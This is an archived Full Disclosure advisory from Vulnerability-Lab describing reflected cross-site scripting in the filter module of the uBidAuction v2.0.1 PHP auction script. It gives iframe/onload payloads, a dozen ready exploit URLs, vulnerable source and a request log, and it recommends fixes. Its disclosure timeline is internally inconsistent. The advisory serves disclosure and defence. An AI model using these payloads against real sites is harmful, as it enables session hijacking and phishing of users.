[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] uBidAuction v2.0.1 - Multiple XSS Web Vulnerabilities
From: "info () vulnerability-lab ! com" <info () vulnerability-lab ! com>
Date: 2022-01-25 12:10:00
Message-ID: c0ecc86c-f5c0-fb3d-e612-7d9a01e2f95f () vulnerability-lab ! com
[Download RAW message or body]
[Attachment #2 (multipart/signed)]
[Attachment #4 (unknown)]
Document Title:
===============
uBidAuction v2.0.1 - Multiple XSS Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2289
Release Date:
=============
2022-01-21
Vulnerability Laboratory ID (VL-ID):
====================================
2289
Common Vulnerability Scoring System:
====================================
5.4
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
uBidAuction is a powerful, scalable & fully-featured classic and bid auction software that lets \
create the ultimate profitable online auctions website. It allows to manage entire online \
auction operation: create new auctions within seconds, view members auctions and use the \
auction extension settings tool.
(Copy of the Homepage:https://www.apphp.com/codemarket/items/48/ubidauction-php-classic-and-bid-auctions-script \
)
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple non-persistent cross site \
web vulnerabilities in the uBidAuction v2.0.1 script web-application.
Affected Product(s):
====================
ApPHP
Product: uBidAuction v2.0.1 - Auction Script (PHP) (Web-Application)
Product: ApPHP MVC Framework v1.2.2 (Framework)
Vulnerability Disclosure Timeline:
==================================
2022-09-01: Researcher Notification & Coordination (Security Researcher)
2022-09-02: Vendor Notification (Security Department)
2022-09-07: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2022-01-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Pre Auth (No Privileges or Session)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Multiple non-persistent cross site web vulnerabilities has been discovered in the official \
uBidAuction v2.0.1 script web-application. The vulnerability allows remote attackers to inject \
own malicious script codes with non-persistent attack vector to compromise browser to \
web-application requests from the client-side.
The cross site web vulnerabilities are located in the `date_created`, `date_from`, `date_to` \
and `created_at` parameters of the `filter` web module. The injection point is located in the \
parameters and the execution occurs in the filter module. The request method to inject the \
malicious script code is GET and the attack vector of the vulnerability is non-persistent on \
client-side.
Successful exploitation of the vulnerability results in session hijacking, non-persistent \
phishing attacks, non-persistent external redirects to malicious source and non-persistent \
manipulation of affected application modules.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] ./orders/myOrders
[+] ./auctions/myAuctions/status/active
[+] ./auctions/myAuctions/status/loose
[+] ./posts/manage
[+] ./news/manage
[+] ./tickets/manage
[+] ./auctions/manage
[+] ./backend/mailingLog/manage
Vulnerable Parameter(s):
[+] date_created
[+] date_from
[+] date_to
[+] created_at
Affected Module(s):
[+] Filter
Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerabilities can be exploited by remote attackers \
without account and with low user interaction. For security demonstration or to reproduce the \
cross site web vulnerability follow the provided information and steps below to continue.
Exploitation: Payload
"><iframe+src%3Devil.source+onload</iframe>
Exploitation: PoC (Role: Member)
https://bid-auction.localhost:8080/orders/myOrders?order_number=1&created_at=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&status=0&but_filter=Filter
https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=test1&name= \
test2&date_from="><iframe+src%3Devil.source+onload&date_to="><iframe+src%3Devil.source \
https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=1&name=a&dat \
e_from=%22%3E%3Ciframe+src%3Devil.source+onload&date_to=b&auction_type_id=&category_id=&status=&but_filter=Filter
https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=1&name=a&da \
te_from=a&date_to=%22%3E%3Ciframe+src%3Devil.source+onload&auction_type_id=&category_id=&status=&but_filter=Filter
https://bid-auction.localhost:8080/auctions/myAuctions/status/loose?auction_number=1&name=a&dat \
e_from=a&date_to=%22%3E%3Ciframe+src%3Devil.source+onload&auction_type_id=&category_id=&status=&but_filter=Filter
https://bid-auction.localhost:8080/auctions/myAuctions/status/loose?auction_number=1&name=a&dat \
e_from=%22%3E%3Ciframe+src%3Devil.source+onload&date_to=b&auction_type_id=&category_id=&status=&but_filter=Filter
Exploitation: PoC (Role: Admin)
https://bid-auction.localhost:8080/posts/manage?post_header=1&created_at=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&but_filter=Filter
https://bid-auction.localhost:8080/news/manage?news_header=1&created_at=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&but_filter=Filter
https://bid-auction.localhost:8080/tickets/manage?topic=a&message=a&first_name%2Clast_name=a&de \
partments=0&status=1&date_created=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&but_filter=Filter
https://bid-auction.localhost:8080/tickets/manage/status/opened?topic=a&message=a&first_name%2C \
last_name=a&departments=0&status=0&date_created=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&but_filter=Filter
https://bid-auction.localhost:8080/auctions/manage?auction_number=1&name=a&date_from=%22%3E%3Ci \
frame+src%3Devil.source+onload&date_to=%22%3E%3Ciframe+src%3Devil.source+onload&auction_type_id=1&category_id=4&status=0&but_filter=Filter
https://bid-auction.localhost:8080/backend/mailingLog/manage?email_subject=a&email_content=b&em \
ail_from=c&email_to=d&sent_at=%22%3E%3Ciframe+src%3Devil.source+onload&status=&but_filter=Filter
Vulnerable Source: ./mailingLog
<div class="content">
<a href="posts/add" class="add-new">Add Post</a><div class="filtering-wrapper">
<form id="frmFilterPosts" action="posts/manage" method="get">
Post Header: <input id="post_header" style="width:100px;" maxlength="255" type="text" \
value="avd" name="post_header"> Date Created: <input id="created_at" maxlength="255" \
style="width:80px;" type="text" value=""><iframe src="evil.source" \
onload="alert(document.cookie)">" name="created_at" /><div class="buttons-wrapper"> <input \
name="" class="button white" \
onclick="jQuery(location).attr('href','https://bid-auction.localhost:8080/posts/manage');" \
type="button" value="Cancel" /> <input name="but_filter" type="submit" value="Filter" />
</div></form></div>
--- PoC Session Logs (GET) ---
https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=test1&name=t \
est2&date_from="><iframe+src%3Devil.source+onload&date_to="><iframe+src%3Devil.source+onload&auction_type_id=1&category_id=1&status=&but_filter=Filter
Host:www.bid-auction-script.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer:https://bid-auction.localhost:8080/auctions/myAuctions
Cookie: apphp_2j9tuqddrg=v1as9gj4qqhakbpgthnrs34np7
-
GET: HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4542
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Reference(s):
https://bid-auction.localhost:8080/posts/manage
https://bid-auction.localhost:8080/orders/myOrders
https://bid-auction.localhost:8080/backend/mailingLog/manage
https://bid-auction.localhost:8080/auctions/myAuctions/status/loose
https://bid-auction.localhost:8080/auctions/myAuctions/status/active
Solution - Fix & Patch:
=======================
The vulnerability can be resolved by a filter or secure encode of the vulnerable date_created, \
date_from, date_to and created_at parameters. Disallow the usage of special chars in the \
affected parameters on get method requests. Sansitize the vulnerable output location to resolve \
the point of execution in the filter module.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] \
-https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any licenses, \
policies, deface websites, hack into databases or trade with stolen data.
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com \
infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php \
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit \
our material contact (admin@ or research@) to get a ask permission.
Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
["OpenPGP_signature.asc" (application/pgp-signature)]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic